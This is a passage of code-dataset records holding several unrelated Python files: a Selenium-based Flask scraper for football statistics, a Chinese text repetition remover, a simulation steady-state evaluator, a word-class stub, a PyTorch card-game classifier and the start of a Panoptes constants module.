+{"seq_id":"582047648","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 16 13:45:10 2020\n\n@author: lemar\n\"\"\"\n\nfrom flask import Flask, json\nfrom selenium import webdriver\nimport os\n#import pandas as pd\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.binary_location = os.environ.get(\"GOOGLE_CHROME_BIN\")\nchrome_options.add_argument(\"--headless\")\nchrome_options.add_argument(\"--disable-dev-shm-usage\")\nchrome_options.add_argument(\"--no-sandbox\")\ndriver = webdriver.Chrome(executable_path=os.environ.get(\"CHROMEDRIVER_PATH\"), chrome_options=chrome_options)\n\napi = Flask(__name__)\n\n@api.route('/rushing', methods=['GET'])\ndef get_rushing():\n print(\"received get request\")\n url = \"https://www.pro-football-reference.com/years/2019/rushing_advanced.htm\"\n #load the page\n driver.get(url)\n print(\"got content\")\n rushing_info = { \"html\" : str(driver.page_source)}\n #rushing_info = { \"html\" : \"rushing info\"}\n print(\"returning content\")\n return json.dumps(rushing_info)\n\nif __name__ == '__main__':\n print(\"server up\")\n api.run()","sub_path":"flask_server.py","file_name":"flask_server.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"639219165","text":"#coding=utf-8\nfrom wordseg_python import Global\n\nPUNC = [',', ',', '。', '.', '!', '!', '\"', '?', '?']\nCOMMON = ['你', '我', '的', '哈', '他', '她']\n \ndef split(sent):\n sent = sent.decode('utf-8', 'ignore').encode('gbk', 'ignore')\n tuples = [(word.decode(\"gbk\").encode(\"utf-8\"), pos)\n for word, pos in Global.GetTokenPos(sent)]\n return [each[0] for each in tuples]\n\ndef remove_rep(sent):\n length = 4\n while length > 1:\n index = -1\n for i in range(len(sent)-2*length+1):\n if ''.join(sent[i:i+length]) == ''.join(sent[i+length:i+2*length]):\n index = i\n break\n if index >= 0:\n #print (length, index)\n sent = sent[:i]+sent[i+length:]\n else:\n length -= 1\n length = 6\n while length > 0:\n index = -1\n for i in range(len(sent)-2*length):\n if (sent[i+length] in PUNC):\n if ''.join(sent[i:i+length]) == ''.join(sent[i+1+length:i+1+2*length]):\n index = i\n break\n if index >= 0:\n #print (length, index)\n sent = sent[:i]+sent[i+length+1:]\n else:\n length -= 1\n return sent\n\n\ndef work(sent):\n before = split(sent)\n after = remove_rep(before)\n if before != after:\n print('before: '+' '.join(before))\n print(' after: '+' '.join(after))\n\n#with open('0330.txt') as f:\n# for line in f:\n# work(line.strip().split()[1])\n","sub_path":"models/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"87534214","text":"#!/usr/bin/env python3\n\nimport csv\nimport math\n\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\n\n#-------------------------------------------------------------------------------\n\n# Imports table from pinetree output and calculates protein production rate\n# at steady state\nclass EvalSteadyState:\n def __init__(self):\n self.time = []\n self.ribosome_counts = []\n self.protein_counts = []\n self.fitness = \"\"\n self.slopes = []\n self.x = []\n self.y = []\n\n def importTable(self,file,protein_name):\n '''open tsv file from pinetree, split each column into lists '''\n simulation = open(file, 'r')\n proteins = []\n time = []\n feature = []\n lines = simulation.readlines()\n linecounter = 0\n for line in lines:\n if linecounter == 0:\n print(\"header found\")\n else:\n data = line.strip().split('\\t')\n proteins.append(float(data[2]))\n time.append(float(data[0]))\n feature.append(str(data[1]))\n linecounter += 1\n simulation.close()\n\n #filter table for protein feature\n for i in range(len(feature)):\n if feature[i] == '__ribosome':\n self.ribosome_counts.append(proteins[i])\n self.time.append(time[i])\n if feature[i] == str(protein_name):\n self.protein_counts.append(proteins[i])\n return(self.time,self.ribosome_counts,self.protein_counts)\n\n def ribo_slope(self,times,ribosome_counts):\n for i in range(len(times)):\n if i <= len(times) - 3:\n try:\n self.slopes.append((ribosome_counts[i+1] - ribosome_counts[i]) / (times[i+1]-times[i]))\n except ZeroDivisionError: \n self.slopes.append(0)\n return self.slopes\n\n def steady_state(self,times,slopes,ribosome_counts,protein_counts):\n '''find where the slope of ribosome counts has leveled at zero,\n calculate the protein production rate after that point'''\n for i in range(len(times)):\n average_slope = np.average(self.slopes[i:i+6]) #average of 5 points in list\n if math.fabs(average_slope) <= 0.01 and i <= (len(times)-10): #finds slopes that were calculated closely around 0\n self.y = protein_counts[i:len(protein_counts)]\n self.x = times[i:len(protein_counts)]\n break\n return self.x, self.y\n\n def linreg(self, x, y):\n slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)\n self.fitness = slope\n return self.fitness\n","sub_path":"scripts/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"359043010","text":"\n\n#calss header\nclass _COUNTERACT():\n\tdef __init__(self,): \n\t\tself.name = \"COUNTERACT\"\n\t\tself.definitions = [u'to reduce or remove the effect of something unwanted by producing an opposite effect: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_counteract.py","file_name":"_counteract.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"436179098","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass CardDataLoader(Dataset):\n \"\"\"Face Landmarks dataset.\"\"\"\n\n def __init__(self, org_data_feat, org_data_label, batch_size):\n self.data_all_feat = org_data_feat\n self.data_all_label = org_data_label\n self.batch_size = batch_size\n\n def __len__(self):\n if(len(self.data_all_feat) % self.batch_size == 0):\n return len(self.data_all_feat) // self.batch_size\n else:\n return (len(self.data_all_feat) // self.batch_size)+1\n #return len(self.data_all_feat)\n\n def __getitem__(self, idx):\n begin = self.batch_size*idx\n end = self.batch_size*(idx+1)\n feats = self.data_all_feat[begin:end]\n labels = self.data_all_label[begin:end]\n return feats, labels\n\n##############################################################################################################\n#\n#importing data files\n#\ntraining_file = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/trainingDataMovement.txt\", \"r\")\ntraining_data = training_file.readlines()\ntraining_suit = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/trainingDataSuit.txt\", \"r\")\ntraining_data_suit = training_suit.readlines()\ntraining_rank = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/trainingDataRank.txt\", \"r\")\ntraining_data_rank = training_rank.readlines()\ntraining_uniqueness = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/trainingDataUniqueness.txt\", \"r\")\ntraining_data_uniqueness = training_uniqueness.readlines()\nprint(\"reading training data done\")\n\nvalidation_file = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/validationDataMovement.txt\", \"r\")\nvalidation_data = validation_file.readlines()\nvalidation_suit = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/validationDataSuit.txt\", \"r\")\nvalidation_data_suit = validation_suit.readlines()\nvalidation_rank = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/validationDataRank.txt\", \"r\")\nvalidation_data_rank = validation_rank.readlines()\nvalidation_uniqueness = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/validationDataUniqueness.txt\", \"r\")\nvalidation_data_uniqueness = validation_uniqueness.readlines()\nprint(\"reading validation data done\")\n\ntesting_file = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/testingDataMovement.txt\", \"r\")\ntesting_data = testing_file.readlines()\ntesting_suit = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/testingDataSuit.txt\", \"r\")\ntesting_data_suit = testing_suit.readlines()\ntesting_rank = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/testingDataRank.txt\", \"r\")\ntesting_data_rank = testing_rank.readlines()\ntesting_uniqueness = open(\"/home/benjaminsang/PycharmProjects/BirdsOfAFeatherNN/venv/data/testingDataUniqueness.txt\", \"r\")\ntesting_data_uniqueness = testing_uniqueness.readlines()\nprint(\"reading testing data done\")\n\nstring_training_data = []\nstring_training_data_rank = []\nstring_training_data_suit = []\nstring_training_data_uniqueness = []\ninput_training_data = []\ninput_training_data_rank = []\ninput_training_data_suit = []\ninput_training_data_uniqueness = []\ninput_training_data_total = []\noutput_training_data = []\n\nstring_validation_data = []\nstring_validation_data_rank = []\nstring_validation_data_suit = []\nstring_validation_data_uniqueness = []\ninput_validation_data = []\ninput_validation_data_rank = []\ninput_validation_data_suit = []\ninput_validation_data_uniqueness = []\ninput_validation_data_total = []\noutput_validation_data = []\n\nstring_testing_data = []\nstring_testing_data_rank = []\nstring_testing_data_suit = []\nstring_testing_data_uniqueness = []\ninput_testing_data = []\ninput_testing_data_rank = []\ninput_testing_data_suit = []\ninput_testing_data_uniqueness = []\ninput_testing_data_total = []\noutput_testing_data = []\n\n# our data\n# N = 1862\n# N_valid = 1120\n# N_test = 744\n\nN = 1862\nN_valid = 1120\nN_test = 997018\n\n# their data\n# N = 682728\n# N_valid = 363022\n# N_test = 347680\n\n# combined data\n# N = 684590\n# N_valid = 364142\n# N_test = 1344698\n\nD_in = 32\nD_out = 2\nH1, H2, H3, H4, H5, H6, H7, H8, H9, H10, H11, H12, H13, H14, H15 = 30, 28, 26, 24, 22, 20, 18, 16, 14, 12, 10, 8, 6, 4, 2\n\n######################################################\n#\n#creating training set\n#\nfor line in training_data:\n data = line.split()\n string_training_data.append(data)\nfor line in training_data_suit:\n data = line.split()\n string_training_data_suit.append(data)\nfor line in training_data_rank:\n data = line.split()\n string_training_data_rank.append(data)\nfor line in training_data_uniqueness:\n data = line.split()\n string_training_data_uniqueness.append(data)\nprint(\"training set to string complete\")\n\n#####################################################\n#\n#creating validation set\n#\nfor line in validation_data:\n data = line.split()\n string_validation_data.append(data)\nfor line in validation_data_suit:\n data = line.split()\n string_validation_data_suit.append(data)\nfor line in validation_data_rank:\n data = line.split()\n string_validation_data_rank.append(data)\nfor line in validation_data_uniqueness:\n data = line.split()\n string_validation_data_uniqueness.append(data)\nprint(\"validation set to string complete\")\n\n####################################################\n#\n#creating testing set\n#\nfor line in testing_data:\n data = line.split()\n string_testing_data.append(data)\nfor line in testing_data_suit:\n data = line.split()\n string_testing_data_suit.append(data)\nfor line in testing_data_rank:\n data = line.split()\n string_testing_data_rank.append(data)\nfor line in testing_data_uniqueness:\n data = line.split()\n string_testing_data_uniqueness.append(data)\nprint(\"testing set to string complete\")\n\n#####################################################\n#\n#converting training set into data training set\n#\nfor data_lines in string_training_data:\n if (data_lines[0] == '+1'):\n output = []\n output.append(1.0)\n output.append(0.0)\n output_training_data.append(output)\n if (data_lines[0] == '-1'):\n output = []\n output.append(0.0)\n output.append(1.0)\n output_training_data.append(output)\n\nfor data_lines in string_training_data:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_training_data.append(line_data)\n position = 0\nfor data_lines in string_training_data_rank:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_training_data_rank.append(line_data)\n position = 0\nfor data_lines in string_training_data_suit:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_training_data_suit.append(line_data)\n position = 0\nfor data_lines in string_training_data_uniqueness:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_training_data_uniqueness.append(line_data)\n position = 0\nprint(\"training data to arrays complete\")\n##########################################################\n#\n#converting validation set into data validation set\n#\nfor data_lines in string_validation_data:\n if (data_lines[0] == '+1'):\n output = []\n output.append(1.0)\n output.append(0.0)\n output_validation_data.append(output)\n if (data_lines[0] == '-1'):\n output = []\n output.append(0.0)\n output.append(1.0)\n output_validation_data.append(output)\nfor data_lines in string_validation_data:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range(1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_validation_data.append(line_data)\n position = 0\nfor data_lines in string_validation_data_rank:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_validation_data_rank.append(line_data)\n position = 0\nfor data_lines in string_validation_data_suit:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_validation_data_suit.append(line_data)\n position = 0\nfor data_lines in string_validation_data_uniqueness:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_validation_data_uniqueness.append(line_data)\n position = 0\nprint(\"validation data to arrays complete\")\n#########################################################\n#\n#converting testing set into data testing sets\n#\nfor data_lines in string_testing_data:\n if (data_lines[0] == '+1'):\n output = []\n output.append(1.0)\n output.append(0.0)\n output_testing_data.append(output)\n if (data_lines[0] == '-1'):\n output = []\n output.append(0.0)\n output.append(1.0)\n output_testing_data.append(output)\nfor data_lines in string_testing_data:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range(1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_testing_data.append(line_data)\n position = 0\nfor data_lines in string_testing_data_rank:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range(1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_testing_data_rank.append(line_data)\n position = 0\nfor data_lines in string_testing_data_suit:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range(1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_testing_data_suit.append(line_data)\n position = 0\nfor data_lines in string_testing_data_uniqueness:\n line_data = []\n for i in range (4):\n line_data.append([])\n position = 0\n count = 0\n for i in range (1, len(data_lines)):\n line_data[position].append(float(data_lines[i]))\n count += 1\n if (count == 4):\n position += 1\n count = 0\n input_testing_data_uniqueness.append(line_data)\n position = 0\nprint(\"testing data to arrays complete\")\n##############################################################\n#\n#combining suit, data, and rank into one big tensor\n#\nfor i in range(0, N):\n training_three_channels = []\n # training_three_channels.append(input_training_data[i])\n # training_three_channels.append(input_training_data_rank[i])\n # training_three_channels.append(input_training_data_suit[i])\n training_three_channels.append(input_training_data_uniqueness[i])\n input_training_data_total.append(training_three_channels)\nfor i in range(0, N_valid):\n validation_three_channels = []\n # validation_three_channels.append(input_validation_data[i])\n # validation_three_channels.append(input_validation_data_rank[i])\n # validation_three_channels.append(input_validation_data_suit[i])\n validation_three_channels.append(input_validation_data_uniqueness[i])\n input_validation_data_total.append(validation_three_channels)\nfor i in range(0, N_test):\n testing_three_channels = []\n # testing_three_channels.append(input_testing_data[i])\n # testing_three_channels.append(input_testing_data_rank[i])\n # testing_three_channels.append(input_testing_data_suit[i])\n testing_three_channels.append(input_testing_data_uniqueness[i])\n input_testing_data_total.append(testing_three_channels)\nprint(\"combining data complete\")\n######################################################################\n#\n#converting into numpy arrays\n#\n\nnumpy_training_output_data = np.asarray(output_training_data, dtype=np.float32)\nnumpy_training_input_data = np.asarray(input_training_data_total, dtype=np.float32)\n\nnumpy_validation_output_data = np.asarray(output_validation_data, dtype=np.float32)\nnumpy_validation_input_data = np.asarray(input_validation_data_total, dtype=np.float32)\n\nnumpy_testing_output_data = np.asarray(output_testing_data, dtype=np.float32)\nnumpy_testing_input_data = np.asarray(input_testing_data_total, dtype=np.float32)\n\nprint(\"conversion to numpy arrays complete\")\n##########################################################################3\n#\n#converting to tensors\n#\ntensor_training_output_data = torch.from_numpy(numpy_training_output_data).float()\ntensor_training_input_data = torch.from_numpy(numpy_training_input_data).float()\n\ntensor_validation_output_data = torch.from_numpy(numpy_validation_output_data).float()\ntensor_validation_input_data = torch.from_numpy(numpy_validation_input_data).float()\n\ntensor_testing_output_data = torch.from_numpy(numpy_testing_output_data).float()\ntensor_testing_input_data = torch.from_numpy(numpy_testing_input_data).float()\n\nprint(\"conversion to tensors complete\")\n\n########################################################\n# debugging images\n\n# def imshow_three(img):\n# npimg = img.numpy()\n# plt.imshow(npimg[0, :, :])\n# plt.imshow(npimg[1, :, :])\n# plt.imshow(npimg[2, :, :])\n# plt.imshow(npimg[3, :, :])\n# plt.imshow(npimg)\n#\n#\n# def imshow_one(img):\n# img = img / (3 - 0)\n# npimg = img.numpy()\n# plt.imshow(npimg)\n#\n# img_test = tensor_testing_input_data[3]\n# imshow_three(img_test)\n\n##################################################################\n#\n#image recognizer nn model\n#\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n # in_ch, out_ch, kernel_size, stride, padding\n self.conv1 = nn.Conv2d(1, 2, 3, 1, 1) # 6 was chosen because tutorial is 3-6\n self.conv1_batch = nn.BatchNorm2d(4)\n self.pool = nn.MaxPool2d(2, 2)\n self.fc1 = nn.Linear(2 * 2 * 2, 32)\n self.fc2 = nn.Linear(32, 30)\n self.fc3 = nn.Linear(30, 28)\n self.fc4 = nn.Linear(28, 26)\n self.fc5 = nn.Linear(26, 24)\n self.fc6 = nn.Linear(24, 22)\n self.fc7 = nn.Linear(22, 20)\n self.fc8 = nn.Linear(20, 18)\n self.fc9 = nn.Linear(18, 16)\n self.fc10 = nn.Linear(16, 14)\n self.fc11 = nn.Linear(14, 12)\n self.fc12 = nn.Linear(12, 10)\n self.fc13 = nn.Linear(10, 8)\n self.fc14 = nn.Linear(8, 6)\n self.fc15 = nn.Linear(6, 4)\n self.fc16 = nn.Linear(4, 2)\n\n def forward(self, x):\n x = self.pool(F.relu(self.conv1(x)))\n x = x.view(-1, 2 * 2 * 2) # based on size calculation\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = F.relu(self.fc3(x))\n x = F.relu(self.fc4(x))\n x = F.relu(self.fc5(x))\n x = F.relu(self.fc6(x))\n x = F.relu(self.fc7(x))\n x = F.relu(self.fc8(x))\n x = F.relu(self.fc9(x))\n x = F.relu(self.fc10(x))\n x = F.relu(self.fc11(x))\n x = F.relu(self.fc12(x))\n x = F.relu(self.fc13(x))\n x = F.relu(self.fc14(x))\n x = F.relu(self.fc15(x))\n x = self.fc16(x)\n return x\n\nmodel = Net()\n\n################################################################\n#\n#using gpu\n#\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nmodel.to(device)\n\n######################################################################\n\nd = CardDataLoader(tensor_training_input_data, tensor_training_output_data, 100)\n\n################################################################\n#\n#send tensors to gpu\n#\n\n#defining loss function\nloss_fn = torch.nn.MSELoss(reduction='sum')\n\n#defining optimizer and scheduler for learning rate\nlearning_rate = 0.001\noptimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=130, gamma=0.1)\n\n########################################################################\n#\n#training the neural network\n#\nfor t in range(500):\n scheduler.step()\n running_loss=0.0\n for ii in range(len(d)):\n feats, labels = d[ii]\n\n feats = feats.to(device)\n labels = labels.to(device) \n\n output_pred = model(feats)\n\n # pos_train_samples = (output_pred[:, 0] > output_pred[:, 1]).sum()\n # neg_train_samples = (output_pred[:, 0] <= output_pred[:, 1]).sum()\n # output_pred_pos = torch.cuda.FloatTensor([1, 0]).expand(pos_train_samples, -1)\n # output_pred[output_pred[:, 0] > output_pred[:, 1]] = output_pred_pos\n # output_pred_neg = torch.cuda.FloatTensor([0, 1]).expand(neg_train_samples, -1)\n # output_pred[output_pred[:, 0] <= output_pred[:, 1]] = output_pred_neg\n\n loss = loss_fn(output_pred, labels)\n\n optimizer.zero_grad()\n\n loss.backward()\n\n optimizer.step()\n\n running_loss += loss.item()\n #print(loss.item())\n if ii == (len(d)-1): # print every 2000 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (t + 1, ii + 1, running_loss / len(d)))\n running_loss = 0.0\n\n########################################################################\n#\n#checking accuracy with training data after training\n#\n# output_train_pred = model(tensor_training_input_data)\n#\n# loss = loss_fn(output_train_pred, tensor_training_output_data)\n#\n# # pos_samples = (output_train_pred[:, 0] > output_train_pred[:, 1]).sum()\n# # neg_samples = (output_train_pred[:, 0] <= output_train_pred[:, 1]).sum()\n# # output_train_pred_pos = torch.cuda.FloatTensor([1, 0]).expand(pos_samples, -1)\n# # output_train_pred[output_train_pred[:, 0] > output_train_pred[:, 1]] = output_train_pred_pos\n# # output_train_pred_neg = torch.cuda.FloatTensor([0, 1]).expand(neg_samples, -1)\n# # output_train_pred[output_train_pred[:, 0] <= output_train_pred[:, 1]] = output_train_pred_neg\n#\n# y_all = torch.cat((tensor_training_output_data, output_train_pred), 1)\n# print(y_all)\n# # In order to compute the accuracy, you need to find the samples with the same label\n# error_train = tensor_training_output_data.sub(output_train_pred)\n# error_train = error_train.abs_()\n# error_train = error_train.sum(1) # summation column-wise, i.e. all output nodes\n# # find all zero values (i.e. each zero will count as one),\n# mask_error_train = (error_train == 0.0)\n# # add them up, (we need to convert the result into float type to avoid getting zero)\n# number_of_correct = mask_error_train.sum().type(torch.FloatTensor)\n# # then divide by the total number of samples.\n# ACC_train = number_of_correct.div(N * 1.0) * 100.0\n# print(\"Accuracy = %f %%\" % ACC_train)\n\ntensor_validation_output_data = tensor_validation_output_data.to(device)\ntensor_validation_input_data = tensor_validation_input_data.to(device)\ntensor_testing_output_data = tensor_testing_output_data.to(device)\ntensor_testing_input_data = tensor_testing_input_data.to(device)\n\n######################################################################\n#\n#checking accuracy with validation data after training\n#\noutput_valid_pred = model(tensor_validation_input_data)\n\nloss = loss_fn(output_valid_pred, tensor_validation_output_data)\n\npos_samples = (output_valid_pred[:, 0] > output_valid_pred[:, 1]).sum()\nneg_samples = (output_valid_pred[:, 0] <= output_valid_pred[:, 1]).sum()\noutput_valid_pred_pos = torch.cuda.FloatTensor([1, 0]).expand(pos_samples, -1)\noutput_valid_pred[output_valid_pred[:, 0] > output_valid_pred[:, 1]] = output_valid_pred_pos\noutput_valid_pred_neg = torch.cuda.FloatTensor([0, 1]).expand(neg_samples, -1)\noutput_valid_pred[output_valid_pred[:, 0] <= output_valid_pred[:, 1]] = output_valid_pred_neg\n\ny_all = torch.cat((tensor_validation_output_data, output_valid_pred), 1)\nprint(y_all)\n# In order to compute the accuracy, you need to find the samples with the same label\nerror_valid = tensor_validation_output_data.sub(output_valid_pred)\nerror_valid = error_valid.abs_()\nerror_valid = error_valid.sum(1) # summation column-wise, i.e. all output nodes\n# find all zero values (i.e. each zero will count as one),\nmask_error_valid = (error_valid == 0.0)\n# add them up, (we need to convert the result into float type to avoid getting zero)\nnumber_of_correct = mask_error_valid.sum().type(torch.FloatTensor)\n# then divide by the total number of samples.\nACC_valid = number_of_correct.div(N_valid * 1.0) * 100.0\nprint(\"Accuracy = %f %%\" % ACC_valid)\n#\n######################################################################################\n#\n#checking accuracy with testing data after training\n#\noutput_test_pred = model(tensor_testing_input_data)\n\nloss = loss_fn(output_test_pred, tensor_testing_output_data)\n\npos_samples = (output_test_pred[:, 0] > output_test_pred[:, 1]).sum()\nneg_samples = (output_test_pred[:, 0] <= output_test_pred[:, 1]).sum()\noutput_test_pred_pos = torch.cuda.FloatTensor([1, 0]).expand(pos_samples, -1)\noutput_test_pred[output_test_pred[:, 0] > output_test_pred[:, 1]] = output_test_pred_pos\noutput_test_pred_neg = torch.cuda.FloatTensor([0, 1]).expand(neg_samples, -1)\noutput_test_pred[output_test_pred[:, 0] <= output_test_pred[:, 1]] = output_test_pred_neg\n\ny_all = torch.cat((tensor_testing_output_data, output_test_pred), 1)\nprint(y_all)\n# In order to compute the accuracy, you need to find the samples with the same label\nerror_test = tensor_testing_output_data.sub(output_test_pred)\nerror_test = error_test.abs_()\nerror_test = error_test.sum(1) # summation column-wise, i.e. all output nodes\n# find all zero values (i.e. each zero will count as one),\nmask_error_test = (error_test == 0.0)\n# add them up, (we need to convert the result into float type to avoid getting zero)\nnumber_of_correct = mask_error_test.sum().type(torch.FloatTensor)\n# then divide by the total number of samples.\nACC_test = number_of_correct.div(N_test * 1.0) * 100.0\nprint(\"Accuracy = %f %%\" % ACC_test)\n\nimport sklearn.metrics as metrics\n\ntensor_testing_output_data = tensor_testing_output_data.cpu().detach().numpy()\noutput_test_pred = output_test_pred.cpu().detach().numpy()\n\ny_all_gt = tensor_testing_output_data[:, 0]\ny_all_pred = output_test_pred[:, 0]\n\ntn, fp, fn, tp = metrics.confusion_matrix(y_all_gt, y_all_pred).ravel()\nprint(tp, fp, fn, tn)\nprint(tp / (tp+fn))\nprint(tn / (tn+fp))\n# f1_test = metrics.f1_score(y_all_gt, y_all_pred)\n#print(f1_test)\n# for data in range(1862):\n# input = tensor_testing_input_data[data]\n# outputs = model(input)\n# _, predicted = torch.max(outputs.data, 1)\n# total += 1\n# correct += (predicted == tensor_testing_output_data[data]).item()\n\n#print('Accuracy of the network on the 10000 test images: %d %%' % (100 * correct / total))","sub_path":"Neural_Network/bin/Birds_of_A_Feather_NN.py","file_name":"Birds_of_A_Feather_NN.py","file_ext":"py","file_size_in_byte":24588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"589034036","text":"\"\"\"\nCopyright 2018, Oath Inc.\nLicensed under the terms of the Apache 2.0 license. See LICENSE file in project root for terms.\n\nThis module contains constants used throughout the Panoptes system\n\"\"\"\n\n# System Wide Constants\nimport signal\n# The SIGNALS_TO_NAMES_DICT code comes from Python Standard Library By Example\nSIGNALS_TO_NAMES_DICT = dict((getattr(signal, n), n)\n for n in dir(signal) if n.startswith('SIG') and '_' not in n)\nKEY_VALUE_NAMESPACE_PREFIX = 'panoptes:'\nDEFAULT_ROOT_LOGGER_NAME = 'panoptes'\nDEFAULT_LOG_FORMAT = '[%(asctime)s: %(levelname)s/%(processName)s] %(message)s'\nCELERY_LOADER_MODULE = 'celery.utils.imports'\nDEFAULT_REDIS_GROUP_NAME = 'default'\nKV_STORE_DELIMITER = '|'\nKV_STORE_SCAN_ITER_COUNT = 1000\nKV_NAMESPACE_DELIMITER = ':'\n\n# Configuration Manager Related Constants\nCONFIG_FILE_ENVIRONMENT_VARIABLE = 'PANOPTES_CONFIG_FILE'\nDEFAULT_CONFIG_FILE_PATH = '/home/panoptes/conf/panoptes.ini'\n\n# Plugin Scheduler Related Constants\nPLUGIN_TYPES = ['discovery', 'polling', 'enrichment']\nPLUGIN_EXTENSION = 'panoptes-plugin'\nPLUGINS_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'plugins_kv'\nPLUGIN_SCHEDULER_LOCK_PATH = '/panoptes/plugin_scheduler'\nPLUGIN_CLIENT_ID_PREFIX = 'plugin'\n\n# Plugin Agent Related Constants\nPLUGINS_METADATA_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'plugins_metadata'\nPLUGIN_AGENT_LOCK_PATH = '/panoptes/plugin_agent'\nPLUGIN_AGENT_LOCK_ACQUIRE_TIMEOUT = 5\nPLUGIN_AGENT_PLUGIN_TIMESTAMPS_EXPIRE = 604800\nPLUGIN_AGENT_PLUGIN_EXPIRES_MULTIPLE = 2\nPLUGIN_AGENT_PLUGIN_TIME_LIMIT_MULTIPLE = 1.25\n\n# Secrets Manager Related Constants\nSECRETS_MANAGER_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'secrets'\n\n# Discovery Manager Related Constants\nDISCOVERY_PLUGIN_SCHEDULER_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'discovery_plugin_scheduler'\nDISCOVERY_PLUGIN_SCHEDULER_CELERY_APP_NAME = 'discovery_plugin_scheduler'\nDISCOVERY_PLUGIN_SCHEDULER_CELERY_TASK_PREFIX = 'discovery_plugin_scheduler'\nDISCOVERY_PLUGIN_SCHEDULER_LOCK_ACQUIRE_TIMEOUT = 5\n\n# Discovery Plugin Agent Related Constants\nDISCOVERY_PLUGIN_AGENT_KEY_VALUE_NAMESPACE = KEY_VALUE_NAMESPACE_PREFIX + 'discovery_plugin_agent_kv'\nDISCOVERY_PLUGIN_AGENT_MODULE_NAME = 'yahoo_panoptes.discovery.discovery_plugin_agent.discovery_plugin_task'\nDISCOVERY_PLUGIN_AGENT_CELERY_APP_NAME = 'discovery_plugin_agent'\nDISCOVERY_PLUGIN_AGENT_PLUGINS_CHILD_LOGGER_NAME = 